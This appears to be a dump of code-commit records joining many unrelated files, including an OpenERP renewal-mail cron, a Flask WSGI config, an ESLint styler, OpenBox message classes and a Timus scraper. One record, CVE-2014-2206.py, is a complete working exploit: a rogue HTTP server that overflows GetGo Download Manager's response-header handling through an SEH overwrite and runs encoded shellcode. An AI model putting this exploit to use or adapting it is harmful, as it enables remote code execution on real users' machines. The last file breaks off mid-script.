import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('[email protected]', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
. ${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('[email protected]', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | Python |
2aa7a6260d9d5a74ee81677be2bd5f97774f9116 | Add tests for internal gregorian functions. | jwg4/calexicon,jwg4/qual | calexicon/internal/tests/test_gregorian.py | calexicon/internal/tests/test_gregorian.py | import unittest
from calexicon.internal.gregorian import is_gregorian_leap_year
class TestGregorian(unittest.TestCase):
def test_is_gregorian_leap_year(self):
self.assertTrue(is_gregorian_leap_year(2000))
self.assertTrue(is_gregorian_leap_year(1984))
self.assertFalse(is_gregorian_leap_year(1900))
self.assertFalse(is_gregorian_leap_year(1901))
| apache-2.0 | Python |
|
387d05dbdb81bacc4851adffbfd7f827e709d4cc | Add Step class - Create Step.py to hold code for the Step class. - The Step class represents a single step/instruction for a Recipe object. | VictorLoren/pyRecipeBook | Step.py | Step.py | # Step object
class Step:
# Initiate object
def __init__(self,description):
self.description = description
| mit | Python |
|
7d8a566ac51e7e471603c2160dce2046eb698738 | add sn domains conversion tool | exzhawk/ipv6-hosts,danny200309/ipv6-hosts,Phecda/ipv6-hosts,tel5169553/ipv6-hosts,offbye/ipv6-hosts,greatlse/ipv6-hosts,zhenghj7/ipv6-hosts,afdnlw/ipv6-hosts,tjshi/ipv6-hosts,Lan-minqi/ipv6-hosts,AlexDialga/ipv6-hosts,zhenghj7/ipv6-hosts,lennylxx/ipv6-hosts,AlexDialga/ipv6-hosts,JYzor/ipv6-hosts,Badredapple/ipv6-hosts,greatlse/ipv6-hosts,exzhawk/ipv6-hosts,Lan-minqi/ipv6-hosts,tjshi/ipv6-hosts,Badredapple/ipv6-hosts,lennylxx/ipv6-hosts,bygloam/ipv6-hosts,bygloam/ipv6-hosts,afdnlw/ipv6-hosts,gaojunchen/ipv6-hosts,offbye/ipv6-hosts,JYzor/ipv6-hosts,gaojunchen/ipv6-hosts,Phecda/ipv6-hosts,tel5169553/ipv6-hosts,kang000feng/ipv6-hosts,danny200309/ipv6-hosts,kang000feng/ipv6-hosts | conv.py | conv.py | #!/usr/bin/env python
# Read the wiki for more infomation
# https://github.com/lennylxx/ipv6-hosts/wiki/sn-domains
import sys
table = '1023456789abcdefghijklmnopqrstuvwxyz'
def iata2sn(iata):
global table
sn = ''
for v in iata[0:3]:
i = ((ord(v) - ord('a')) * 7 + 5) % 36
sn += table[i]
return sn
def sn2iata(sn):
global table
iata = ''
for v in sn:
i = table.index(v)
i = (5 - i % 7) * 5 + i / 7 + 10
iata += table[i]
return iata
def num2code(num):
global table
code = ''
for v in num:
i = ((ord(v) - ord('0') + 1) * 7) % 36
code += table[i]
return code
def code2num(code):
global table
num = ''
for v in code:
i = table.index(v)
i = i / 7 + i % 7 - 1
num += str(i)
return num
def main():
if len(sys.argv) != 3:
print 'usage:\n\t./%s -i iata\n\t./%s -s sn'\
% (sys.argv[0], sys.argv[0])
sys.exit(1)
input = sys.argv[2]
ret = ''
if sys.argv[1] == '-i':
ret += iata2sn(input[0:3])
ret += num2code(input[3:5])
ret += 'n'
ret += num2code(input[6:8])
print ret
elif sys.argv[1] == '-s':
ret += sn2iata(input[0:3])
ret += code2num(input[3:5])
ret += 's'
ret += code2num(input[6:8])
print ret
else:
print 'Unknown option.'
sys.exit(1)
if __name__ == '__main__':
main()
| mit | Python |
|
d2bdbd0d851fda046c0be55105a211a382c22766 | Add Day 2 | icydoge/AdventOfCodeSolutions | day2.py | day2.py | #Advent of Code December 2
#Written by icydoge - icydoge AT gmail dot com
with open('paper.txt') as f:
content = f.read().splitlines()[:-1] #Remove last empty line
part_one_answer = 0
part_two_answer = 0
for box in content:
dimensions = sorted(map(int,box.split('x')))
slack = dimensions[0] * dimensions[1]
wrapping = 2 * (dimensions[0] * dimensions[1] + dimensions[1] * dimensions[2] + dimensions[0] * dimensions[2])
ribbon = (dimensions[0] + dimensions[1]) * 2
bow = dimensions[0] * dimensions[1] * dimensions[2]
part_one_answer += wrapping + slack
part_two_answer += ribbon + bow
print "Total square feet of wrapping paper (Part One):", part_one_answer
print "Total feet of ribbon (Part Two):", part_two_answer | mit | Python |
|
acf4ad1e5948354281fec040badfe412f5194529 | add wsgi | jmcomber/FlaskDB,jmcomber/FlaskDB,jmcomber/FlaskDB | flaskr/flaskr.wsgi | flaskr/flaskr.wsgi | <VirtualHost *>
ServerName example.com
WSGIDaemonProcess flaskr user=user1 group=group1 threads=5
WSGIScriptAlias / /var/www/FlaskDB/flaskr/flaskr.wsgi
<Directory /var/www/FlaskDB/flaskr>
WSGIProcessGroup flaskr
WSGIApplicationGroup %{GLOBAL}
Order deny,allow
Allow from all
</Directory>
</VirtualHost> | mit | Python |
|
b6fbdd70a0486718d711a7efc310e350a1837b9c | add collapse reads code | lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster,lpantano/seqcluster | seqcluster/collapse.py | seqcluster/collapse.py | import os
from libs.fastq import collapse, splitext_plus
import logging
logger = logging.getLogger('seqbuster')
def collapse_fastq(args):
"""collapse fasq files after adapter trimming
"""
idx = 0
try:
seqs = collapse(args.fastq)
out_file = splitext_plus(os.path.basename(args.fastq))[0] + "_trimmed.fastq"
except IOError as e:
logger.error("I/O error({0}): {1}".format(e.errno, e.strerror))
raise "Can not read file"
logger.info("writing output")
with open(os.path.join(args.out, out_file), 'w') as handle:
for seq in seqs:
idx += 1
qual = "".join(seqs[seq].get())
counts = seqs[seq].times
handle.write(("@seq_{idx}_x{counts}\n{seq}\n+\n{qual}\n").format(**locals()))
| mit | Python |
|
871ec5597059934bce64f7d31fa7e5ab165063ee | Add basic GUI frontend | claudemuller/memorise-py | memorise-frontend.py | memorise-frontend.py | #!/usr/bin/env python
# -*- Coding: utf-8 -*-
from tkinter import Tk, Menu
from ttk import Frame, Button, Style
class MemoriseFrontend(Frame):
version = "0.1-py"
padding = 10
def __init__(self, parent):
Frame.__init__(self, parent)
self.parent = parent
self.style = Style()
self.style.theme_use("default")
self._initUI()
def _initUI(self):
self.parent.title("Memorise v" + self.version)
self.columnconfigure(0, pad=self.padding)
self.columnconfigure(1, pad=self.padding)
self.columnconfigure(2, pad=self.padding)
self.columnconfigure(3, pad=self.padding)
self.columnconfigure(4, pad=self.padding)
self.rowconfigure(0, pad=self.padding)
self.rowconfigure(1, pad=self.padding)
self.rowconfigure(2, pad=self.padding)
self.rowconfigure(3, pad=self.padding)
self.rowconfigure(4, pad=self.padding)
# Row 1
btnUp = Button(self, text="Up", command=self._onUpBtn)
btnUp.grid(row=1, column=2)
# Row 2
btnLeft = Button(self, text="Left", command=self._onLeftBtn)
btnLeft.grid(row=2, column=1)
# Row 2
btnRight = Button(self, text="Right", command=self._onRightBtn)
btnRight.grid(row=2, column=3)
# Row 3
btnDown = Button(self, text="Down", command=self._onDownBtn)
btnDown.grid(row=3, column=2)
self.pack()
def _onUpBtn(self):
pass
def _onLeftBtn(self):
pass
def _onRightBtn(self):
pass
def _onDownBtn(self):
pass
def main():
root = Tk()
app = MemoriseFrontend(root)
root.mainloop()
main()
| mit | Python |
|
db81e8ca0b0321994f188daf45211e6ae2dda4a4 | Make a control dataset that only contains sequences with titer data. | nextstrain/augur,blab/nextstrain-augur,nextstrain/augur,nextstrain/augur | dengue/utils/make_titer_strain_control.py | dengue/utils/make_titer_strain_control.py | from Bio import SeqIO
from pprint import pprint
with open('../../data/dengue_titers.tsv', 'r') as f:
titerstrains = set([ line.split()[0] for line in f ])
with open('../../data/dengue_titers.tsv', 'r') as f:
serastrains = set([ line.split()[1] for line in f ])
autologous = titerstrains.intersection(serastrains)
print len(autologous)
strains_with_titers = [s for s in SeqIO.parse(open('../../data/dengue.fasta', 'r'), 'fasta') if s.description.split('|')[0] in autologous ]
SeqIO.write(strains_with_titers, '../../data/control.fasta', 'fasta')
print 'Found %d strains with autologous titers and sequence data.'%len(strains_with_titers)
| agpl-3.0 | Python |
|
d1024a2892c6e171b3d465d56c8a1fad25d7fbdc | Create ESLint styler | stopthatcow/zazu,stopthatcow/zazu | zazu/plugins/eslint_styler.py | zazu/plugins/eslint_styler.py | # -*- coding: utf-8 -*-
"""eslint plugin for zazu."""
import zazu.styler
zazu.util.lazy_import(locals(), [
'subprocess',
'os',
'tempfile'
])
__author__ = "Patrick Moore"
__copyright__ = "Copyright 2018"
class eslintStyler(zazu.styler.Styler):
"""ESLint plugin for code styling."""
def style_string(self, string):
"""Fix a string to be within style guidelines."""
temp = tempfile.NamedTemporaryFile(delete=False, suffix=".js")
temp_path = temp.name
args = ['eslint', '--fix'] + self.options + [temp_path]
temp.write(string)
temp.close()
try:
subprocess.check_output(args)
except subprocess.CalledProcessError:
pass
with open(temp_path, "r") as f:
ret = f.read()
os.remove(temp_path)
return ret
@staticmethod
def default_extensions():
"""Return the list of file extensions that are compatible with this Styler."""
return ['*.js']
@staticmethod
def type():
"""Return the string type of this Styler."""
return 'eslint'
| mit | Python |
|
6d53fcd788ef985c044657a6bf2e6faa5b8b9673 | Create CVE-2014-2206.py | rcesecurity/exploits,rcesecurity/exploits,rcesecurity/exploits | CVE-2014-2206/CVE-2014-2206.py | CVE-2014-2206/CVE-2014-2206.py | #!/usr/bin/python
# Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution
# Version: v4.9.0.1982
# CVE: CVE-2014-2206
# Date: 2014-03-09
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.getgosoft.com
# Tested on: WinXP SP3-GER
#
# Howto / Notes:
# SEH overwrite was taken from outside of loaded modules, because all modules are SafeSEH-enabled
#
from socket import *
from time import sleep
from struct import pack
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
junk0 = "\x90" * 4107
nseh = "\x90\x90\xEB\x06"
seh=pack('<L',0x00280b0b) # call dword ptr ss:[ebp+30] [SafeSEH Bypass]
nops = "\x90" * 50
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d'
shellcode = ("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" +
"\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" +
"\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" +
"\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" +
"\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" +
"\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" +
"\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" +
"\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" +
"\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" +
"\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" +
"\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" +
"\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" +
"\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" +
"\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" +
"\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" +
"\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" +
"\xa5\x59\x50")
payload = junk0 + nseh + seh + nops + shellcode
buffer = "HTTP/1.1 200 "+payload+"\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending buffer: OK\n"
sleep(3)
cl.close()
s.close()
| mit | Python |
|
690b5a994bc20b561632d9aa3e332061457a3d72 | Add missing __init__.py to overkiz tests (#62727) | rohitranjan1991/home-assistant,w1ll1am23/home-assistant,toddeye/home-assistant,home-assistant/home-assistant,toddeye/home-assistant,nkgilley/home-assistant,w1ll1am23/home-assistant,GenericStudent/home-assistant,GenericStudent/home-assistant,nkgilley/home-assistant,mezz64/home-assistant,mezz64/home-assistant,rohitranjan1991/home-assistant,home-assistant/home-assistant,rohitranjan1991/home-assistant | tests/components/overkiz/__init__.py | tests/components/overkiz/__init__.py | """Tests for the overkiz component."""
| apache-2.0 | Python |
|
318b775a150f03e3311cb1a2b93cf21999fac70d | Create base class for openbox messages and create most of the Messages objects | DeepnessLab/obsi,pavel-lazar/obsi,OpenBoxProject/obsi,DeepnessLab/obsi,pavel-lazar/obsi,pavel-lazar/obsi,pavel-lazar/obsi,OpenBoxProject/obsi,OpenBoxProject/obsi,OpenBoxProject/obsi,DeepnessLab/obsi,DeepnessLab/obsi | openbox/messages.py | openbox/messages.py | """
Messages between OBC and OBI
"""
import json
class MessageParsingError(Exception):
pass
class MessageMeta(type):
def __init__(cls, name, bases, dct):
if not hasattr(cls, "messages_registry"):
# this is the base class. Create an empty registry
cls.messages_registry = {}
else:
# this is the derived class. Add cls to the registry
cls.messages_registry[name] = cls
super(MessageMeta, cls).__init__(name, bases, dct)
class Message(object):
"""
The base class for all messages.
Messages shouldn't derive from this class directly but from of it's subclasses.
"""
__metaclass__ = MessageMeta
# a list of the fields in the message, no need to put the 'type' field
__slots__ = ['xid']
# Global XID counter
XID = 0
def __init__(self, **kwargs):
if 'xid' not in kwargs:
kwargs['xid'] = Message.XID
Message.XID += 1
for field in self.__slots__:
try:
setattr(self, field, kwargs[field])
except KeyError:
raise TypeError("Field %s, not given" % field)
@classmethod
def from_json(cls, raw_data):
obj = json.loads(raw_data)
try:
msg_type = obj.pop('type')
clazz = cls.messages_registry[msg_type]
except KeyError:
raise MessageParsingError("Unknown Message Type" % raw_data)
try:
return clazz(**obj)
except TypeError as e:
raise MessageParsingError(e.message)
def to_dict(self):
return dict((field, getattr(self, field)) for field in self.__slots__)
def to_json(self):
obj_dict = self.to_dict()
obj_dict['type'] = self.__class__.__name__
return json.dumps(obj_dict)
def __str__(self):
return self.to_json()
class MessageRequest(Message):
"""
A request message.
"""
pass
class MessageResponse(Message):
"""
A response message
"""
# The fields to copy from the request
__copy_request_fields__ = ['xid']
@classmethod
def from_request(cls, request, **kwargs):
for field in cls.__copy_request_fields__:
kwargs[field] = getattr(request, field)
return cls(**kwargs)
class Hello(MessageRequest):
__slots__ = ['xid', 'dpid', 'version', 'capabilities']
class KeepAlive(MessageRequest):
__slots__ = ['xid', 'dpid']
class ListCapabilitiesRequest(MessageRequest):
__slots__ = ['xid', ]
class ListCapabilitiesResponse(MessageResponse):
__slots__ = ['xid', 'capabilities']
class GlobalStatsRequest(MessageRequest):
__slots__ = ['xid']
class GlobalStatsResponse(MessageResponse):
__slots__ = ['xid', 'stats']
class GlobalStatsReset(MessageRequest):
__slots__ = ['xid']
class ReadRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'read_handle']
class ReadResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'read_handle', 'result']
__copy_request_fields__ = ['xid', 'block_id', 'read_handle']
class WriteRequest(MessageRequest):
__slots__ = ['xid', 'block_id', 'write_handle', 'value']
class WriteResponse(MessageResponse):
__slots__ = ['xid', 'block_id', 'write_handle']
__copy_request_fields__ = ['xid', 'block_id', 'write_handle']
class SetProcessingGraph(MessageRequest):
__slots__ = ['xid', 'required_modules', 'block', 'connectors']
class SetLogServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class BarrierRequest(MessageRequest):
__slots__ = ['xid']
class Error(MessageResponse):
__slots__ = ['xid', 'error_type', 'error_subtype', 'message', 'extended_message']
class SetStorageServer(MessageRequest):
__slots__ = ['xid', 'address', 'port']
class AddCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name', 'module_content', 'content_type', 'content_transfer_encoding', 'translation']
class RemoveCustomModule(MessageRequest):
__slots__ = ['xid', 'module_name'] | apache-2.0 | Python |
|
d08426ffde22c2ded72425f1d1c54923b9aa0b97 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/4b193958ac9b893b33dc03cc6882c70ad4ad509d. | karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,tensorflow/tensorflow-experimental_link_static_libraries_once,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,paolodedios/tensorflow,yongtang/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,karllessard/tensorflow,Intel-tensorflow/tensorflow,paolodedios/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow,paolodedios/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,karllessard/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow,paolodedios/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,yongtang/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,karllessard/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-experimental_link_static_libraries_once,karllessard/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,Intel-tensorflow/tensorflow,tensorflow/tensorflow,yongtang/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,yongtang/tensorflow,yongtang/tensorflow,karllessard/tensorflow,Intel-tensorflow/tensorflow,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-experimental_link_static_libraries_once,tensorflow/tensorflow-pywrap_tf_optimizer,tensorflow/tensorflow-pywrap_tf_optimizer,yongtang/tensorflow,tensorflow/tensorflow-pywrap_saved_model,paolodedios/tensorflow | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "4b193958ac9b893b33dc03cc6882c70ad4ad509d"
TFRT_SHA256 = "5b011d3f3b25e6c9646da078d0dbd8000ca063fa4fe6ef53449692c363fa13f7"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
"""Imports TFRT."""
# Attention: tools parse and update these lines.
TFRT_COMMIT = "f5ea7e9c419b881d7f3136de7a7388a23feee70e"
TFRT_SHA256 = "723c9b1fabc504fed5b391fc766e2504559c2b02b4f4e01c55bc77b8ff0df8ed"
tf_http_archive(
name = "tf_runtime",
sha256 = TFRT_SHA256,
strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
# A patch file can be provided for atomic commits to both TF and TFRT.
# The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
patch_file = None,
)
| apache-2.0 | Python |
79a38e9ef0ac04c4efef55c26f74ad2b11442a7b | add a command to fix the missing packages | dstufft/jutils | crate_project/apps/crate/management/commands/fix_missing_files.py | crate_project/apps/crate/management/commands/fix_missing_files.py | from django.core.management.base import BaseCommand
from packages.models import ReleaseFile
from pypi.processor import PyPIPackage
class Command(BaseCommand):
def handle(self, *args, **options):
i = 0
for rf in ReleaseFile.objects.filter(digest="").distinct("release__package"):
p = PyPIPackage(rf.release.package)
p.process()
i += 1
print rf.release.package.name, rf.release.version
print "Fixed %d packages" % i
| bsd-2-clause | Python |
|
50b9aff7914885b590748ebd8bca4350d138670c | Add admin section for the ``Resources``. | us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite,us-ignite/us_ignite | us_ignite/resources/admin.py | us_ignite/resources/admin.py | from django.contrib import admin
from us_ignite.resources.models import Resource
class ResourceAdmin(admin.ModelAdmin):
list_display = ('name', 'slug', 'status', 'is_featured')
search_fields = ('name', 'slug', 'description', 'url')
list_filter = ('is_featured', 'created')
date_hierarchy = 'created'
raw_id_fields = ['owner', ]
admin.site.register(Resource, ResourceAdmin)
| bsd-3-clause | Python |
|
20c9f1416243c020b270041621098ca20e09eca4 | tag retrieval script added | stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment,stopstalk/stopstalk-deployment | private/scripts/extras/timus_tag_retrieval.py | private/scripts/extras/timus_tag_retrieval.py | """
Copyright (c) 2015-2018 Raj Patel([email protected]), StopStalk
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import bs4, requests
from time import sleep
tags = set([])
for i in xrange(1900, 2111):
url = "http://acm.timus.ru/problem.aspx?space=1&num=%d&locale=en" % i
response = requests.get(url)
soup = bs4.BeautifulSoup(response.text, "lxml")
all_as = soup.find("div",
class_="problem_links").previous_sibling.find_all("a")[:-1]
print i, [x.text for x in all_as]
for tmp in all_as:
tags.add(tmp.text)
sleep(1)
print tags | mit | Python |
|
9932b1989038bd3376b1c5d3f5d9c65a21670831 | add energy calibration to xpd | NSLS-II-XPD/ipython_ophyd,NSLS-II-XPD/ipython_ophyd | profile_collection/startup/42-energy-calib.py | profile_collection/startup/42-energy-calib.py | from __future__ import division, print_function
import numpy as np
from lmfit.models import VoigtModel
from scipy.signal import argrelmax
import matplotlib.pyplot as plt
def lamda_from_bragg(th, d, n):
return 2 * d * np.sin(th / 2.) / n
def find_peaks(chi, sides=6, intensity_threshold=0):
# Find all potential peaks
preliminary_peaks = argrelmax(chi, order=20)[0]
# peaks must have at least sides pixels of data to work with
preliminary_peaks2 = preliminary_peaks[
np.where(preliminary_peaks < len(chi) - sides)]
# make certain that a peak has a drop off which causes the peak height to
# be more than twice the height at sides pixels away
criteria = chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 + sides]
criteria *= chi[preliminary_peaks2] >= 2 * chi[preliminary_peaks2 - sides]
criteria *= chi[preliminary_peaks2] >= intensity_threshold
peaks = preliminary_peaks[np.where(criteria)]
left_idxs = peaks - sides
right_idxs = peaks + sides
peak_centers = peaks
left_idxs[left_idxs < 0] = 0
right_idxs[right_idxs > len(chi)] = len(chi)
return left_idxs, right_idxs, peak_centers
def get_energy_from_std_tth(x, y, d_spacings, ns, plot=False):
# step 1 get the zero
auto_corr = np.correlate(y, y, mode='same')
plt.plot(x, auto_corr)
plt.show()
zero_point = np.argmax(auto_corr)
print(len(x)/2, zero_point)
print(x[len(x)/2], x[zero_point])
new_x = x - x[zero_point]
if plot:
plt.plot(x, y, 'b')
plt.plot(x[zero_point], y[zero_point], 'ro')
plt.plot(new_x, y, 'g')
plt.show()
# step 2 get all the maxima worth looking at
l, r, c = find_peaks(y)
print(l, r, c)
lmfig_centers = []
for lidx, ridx, peak_center in zip(l, r, c):
mod = VoigtModel()
pars = mod.guess(y[lidx: ridx],
x=x[lidx: ridx])
out = mod.fit(y[lidx: ridx], pars,
x=x[lidx: ridx])
lmfig_centers.append(out.values['center'])
if plot:
plt.plot(new_x, y)
plt.plot(new_x[c], y[c], 'ro')
plt.show()
wavelengths = []
for center, d, n in zip(lmfig_centers, d_spacings, ns):
wavelengths.append(lamda_from_bragg(center, d, n))
return np.average(wavelengths)
if __name__ == '__main__':
